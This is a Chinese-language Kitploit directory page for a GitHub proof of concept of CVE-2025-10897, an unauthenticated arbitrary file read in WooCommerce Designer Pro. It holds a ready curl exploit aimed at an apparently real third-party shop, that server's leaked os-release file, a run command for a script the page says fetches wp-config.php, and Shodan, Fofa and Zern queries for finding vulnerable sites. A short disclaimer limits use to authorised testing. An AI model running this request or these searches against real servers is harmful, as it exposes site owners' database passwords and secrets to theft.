Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - 未认证的任意文件读取 | Kitploit
工具/GitHubGitHub/error-inside/cve-2025-10897
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集Web安全渗透测试
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - 未认证的任意文件读取

查看仓库
19天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-10897

Python CVSS License Educational

WooCommerce 是一个面向 WordPress 的开源电子商务插件,可将网站转变为在线商店。WooCommerce Designer Pro 是由 JMA Plugins 开发的 WordPress 插件,使客户能够直接在 WooCommerce 商店中设计和定制产品。

重要提示:WooCommerce 与 WooCommerce Designer Pro 是完全不同的产品。

WooCommerce Designer Pro 支持创建名片、明信片、传单、海报、T恤、贴纸及其他可打印材料,具备 CMYK 色彩支持、PDF 生成和基于画布的设计界面等功能。该插件与 WooCommerce 集成,允许在购买前进行实时产品定制,适用于在线印刷业务和定制商品商店。

CVE-2025-10897 是 WooCommerce Designer Pro 1.9.28 及以下版本中存在的一个未认证任意文件读取漏洞(CWE-22)。攻击者向 POST /wp-admin/admin-ajax.php 发送带有 action=wcdp_convert_resource_cmyk 的请求,并附带指向服务器文件(如 /etc/passwd 或 wp-config.php)的 file:// URL。该插件会在 JSON 响应中返回文件内容。这可在无需任何 WordPress 账户的情况下泄露 wp-config.php 中的数据库密码及其他机密信息。

PoC

请求

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

响应

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}

Base64 解码后的响应:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

使用方法

root@kitploit:~
python CVE-2025-10897-X7.py

注意:我们的 PoC 脚本会尝试获取 wp-config.php,但目标可能将 WordPress 安装在 /var/www 之外的其他位置。

用于搜索易受攻击服务器的参数

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

参考资料

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 未认证任意文件读取
  • NIST - CVE-2025-10897 详细信息
  • WooCommerce 主页
  • WooCommerce Designer Pro - 官方开发者网站
  • WooCommerce Designer Pro - 官方市场
  • Nuclei 模板 - CVE-2025-10897

免责声明

本仓库及其内容严格仅用于合法的安全研究、授权的渗透测试、教育学习和防御目的。通过访问或使用这些材料,您确认对确保自身活动遵守所有适用法律负有全部责任,并且在对任何您不拥有的系统进行测试或应用这些技术之前,已获得适当的授权。

本项目的作者和维护者不对因应用此信息而造成的任何损害、法律后果或滥用承担责任。任何用于未经授权的访问、恶意活动或非法目的的使用均被明确禁止且不予支持。

请负责任地使用。遵守法律。只测试您拥有或已获得明确书面许可测试的系统。

作者

  • ErrorInside // SCT

许可证

SCT-PL

下载工具